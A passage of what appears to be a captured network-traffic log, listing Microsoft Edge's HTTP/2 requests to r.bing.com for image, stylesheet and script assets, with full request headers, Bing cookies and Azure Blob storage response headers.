x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=380965
expires: Sun, 08 Dec 2024 19:58:25 GMT
date: Wed, 04 Dec 2024 10:09:00 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c58f655f.1733306940.b0d8863
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/PJnYbCIkGpZKNrse7LdUBRu2AVQ.svg

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/PJnYbCIkGpZKNrse7LdUBRu2AVQ.svg HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:19:31 GMT
etag: 0x8DCDC60DA2A4DD0
content-length: 743
content-type: image/svg+xml
content-md5: FMGFWdCq/oaMJPflY81M7Q==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: affe78b6-f01e-002d-3e04-176950000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=77668
expires: Thu, 05 Dec 2024 07:43:28 GMT
date: Wed, 04 Dec 2024 10:09:00 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c58f655f.1733306940.b0d886b
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/RMlb4wJDgfz5CE1FrOCWp_s9TJs.br.css

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/RMlb4wJDgfz5CE1FrOCWp_s9TJs.br.css HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: application/signed-exchange;v=b3;q=0.9,*/*;q=0.8
purpose: prefetch
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Fri, 22 Nov 2024 14:04:23 GMT
etag: 0x8DD0AFE9173FEBE
content-length: 7268
content-type: text/css
content-encoding: br
content-md5: knf8UPNERql4JL7Yzqh1Ag==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 40062b42-c01e-006a-3e08-3db63b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.521a1202.1732306360.ef6e3fd9
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=181536
expires: Fri, 06 Dec 2024 12:33:50 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af111f
timing-allow-origin: *
GET

https://r.bing.com/rp/eeSRHmOwBCiYGkxCHmb9VbJ2hT8.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/eeSRHmOwBCiYGkxCHmb9VbJ2hT8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:44:49 GMT
etag: 0x8DCDC64632A6EF0
content-length: 323
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: +CLmYDPZ4qSTibcD/NDa/Q==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3b24d6bd-401e-0070-0122-159954000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=147945
expires: Fri, 06 Dec 2024 03:13:59 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af1296
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/83zI0hMJWlilJFob8oEJ4_0I6j4.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/83zI0hMJWlilJFob8oEJ4_0I6j4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:28:03 GMT
etag: 0x8DCE8C2678A65ED
content-type: text/javascript; charset=utf-8
content-md5: QLqZvnBZLjc5NijnEXP26w==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1d0d4dc3-201e-0060-6e09-1bafb2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 2471
vary: Accept-Encoding
cache-control: public, no-transform, max-age=128092
expires: Thu, 05 Dec 2024 21:43:06 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af1297
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/HndC9IrfiOmnQLZpq0bxaPUIDII.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/HndC9IrfiOmnQLZpq0bxaPUIDII.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:29:02 GMT
etag: 0x8DCE8C28AC2EAB8
content-length: 2634
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: YP0IUbsZfddh5LfrNKc0vw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 38c317d3-701e-0078-40de-1a8227000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.37421202.1732047751.975a55
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=367066
expires: Sun, 08 Dec 2024 16:06:00 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af129e
timing-allow-origin: *
GET

https://r.bing.com/rp/KLrSbzDKMog0mCiPcB9iwoEvlE4.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/KLrSbzDKMog0mCiPcB9iwoEvlE4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:26:40 GMT
etag: 0x8DCDC61D9BDA003
content-length: 932
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 4vFQ72ZNf8ORyGv0/A7BUA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 837d4e76-501e-0002-1798-16e86a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=336118
expires: Sun, 08 Dec 2024 07:30:12 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af129f
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/TaNyfCzxqBX9l7QZbgZUegopTuI.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/TaNyfCzxqBX9l7QZbgZUegopTuI.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 14 Nov 2024 09:56:24 GMT
etag: 0x8DD0492999C1FC5
content-type: text/javascript; charset=utf-8
content-md5: 7P/1lM50lR5NLXB84B2f6A==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2cca9282-801e-0029-26bf-369cd2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 8835
vary: Accept-Encoding
akamai-grn: 0.0c18dd58.1731607593.47ca8d4
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=215680
expires: Fri, 06 Dec 2024 22:02:54 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af129d
timing-allow-origin: *
GET

https://r.bing.com/rp/cfKt7bw67nxWZkkgOIRReDE3rQI.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/cfKt7bw67nxWZkkgOIRReDE3rQI.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:32:42 GMT
etag: 0x8DCE8C30DC01669
content-type: text/javascript; charset=utf-8
content-md5: e7f/zlZuzAgnEk3uqGLnHQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 88ed3102-e01e-0076-31fe-1a6e2c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 264
vary: Accept-Encoding
cache-control: public, no-transform, max-age=339718
expires: Sun, 08 Dec 2024 08:30:12 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12a7
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/8dR1RYrnsnPSX-e26dc1yBQAF44.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/8dR1RYrnsnPSX-e26dc1yBQAF44.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:11:30 GMT
etag: 0x8DCDC5FBB9234C6
content-length: 395
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: bJNwzHWywBuWP28bX2mBGQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5fa04812-b01e-002a-02f0-159fd5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=98554
expires: Thu, 05 Dec 2024 13:30:48 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12ad
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/K3hC1_cQXGFr6cxRJVWYpzZJaAM.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/K3hC1_cQXGFr6cxRJVWYpzZJaAM.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Wed, 25 Sep 2024 12:41:09 GMT
etag: 0x8DCDD5F54E641FF
content-length: 1204
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: IZbFUNKxAIylYfr267f+Iw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b30f05fa-e01e-001b-7af1-17c402000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=294742
expires: Sat, 07 Dec 2024 20:00:36 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12ac
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/n23ANye7L3wtUcgKxoGHb7_ezc4.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/n23ANye7L3wtUcgKxoGHb7_ezc4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:32:51 GMT
etag: 0x8DCE8C3132785D7
akamai-grn: 0.98777b5c.1732001132.35c9eba
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-type: text/javascript; charset=utf-8
content-md5: zen1RFa4GLG9w/XJIRfohw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 06d360c6-301e-005d-1709-1b1a94000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 4908
vary: Accept-Encoding
cache-control: public, no-transform, max-age=162420
expires: Fri, 06 Dec 2024 07:15:14 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12ae
timing-allow-origin: *
GET

https://r.bing.com/rp/DmYomXZ0p9--syG1mm6CnQwvRHg.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/DmYomXZ0p9--syG1mm6CnQwvRHg.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:29:32 GMT
etag: 0x8DCE8C29C4714A6
akamai-grn: 0.bd3f655f.1731573083.9bca1c
content-length: 64359
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: yBOhuH8WUdZCzcrV/Ken2A==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1f3ed3c1-401e-0059-09df-1aef16000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=154999
expires: Fri, 06 Dec 2024 05:11:33 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12af
timing-allow-origin: *
GET

https://r.bing.com/rp/u5YAP_hr2d7b0pdrGRbYesZAIHM.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/u5YAP_hr2d7b0pdrGRbYesZAIHM.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 14 Nov 2024 09:56:56 GMT
etag: 0x8DD0492ACBD139F
content-length: 69575
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: snX6jS0tdoIxKJ0RT0jjXw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 65f9304f-901e-0072-3bbb-369bae000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.48ba1302.1731620539.60a7009d
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=300670
expires: Sat, 07 Dec 2024 21:39:24 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12b0
timing-allow-origin: *
GET

https://r.bing.com/rp/lLk8XmbdNzzlnPRzVzDhaF9yjqw.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/lLk8XmbdNzzlnPRzVzDhaF9yjqw.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:55:01 GMT
etag: 0x8DCDC65D005C0E0
content-length: 430
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: l5PXwpOyUFdqY44wmnrCag==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8bb902d4-901e-0072-3e72-159bae000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=82103
expires: Thu, 05 Dec 2024 08:56:37 GMT
date: Wed, 04 Dec 2024 10:08:14 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306894.1af12b1
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/Gyuq2bqitqDJM0BeAkbKXGlQXNw.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/Gyuq2bqitqDJM0BeAkbKXGlQXNw.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:06:53 GMT
etag: 0x8DCDC5F1663B480
content-length: 714
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: wQmZQwuzNQKGWvk013IgpA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
